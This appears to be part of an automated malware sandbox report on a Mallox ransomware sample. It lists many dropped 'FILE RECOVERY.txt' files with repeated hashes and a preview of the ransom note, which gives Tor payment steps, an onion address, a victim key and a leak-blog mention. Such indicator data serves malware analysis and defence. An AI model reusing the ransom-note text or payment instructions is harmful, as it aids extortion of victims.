                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\AppCache\EQDGIKYN\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
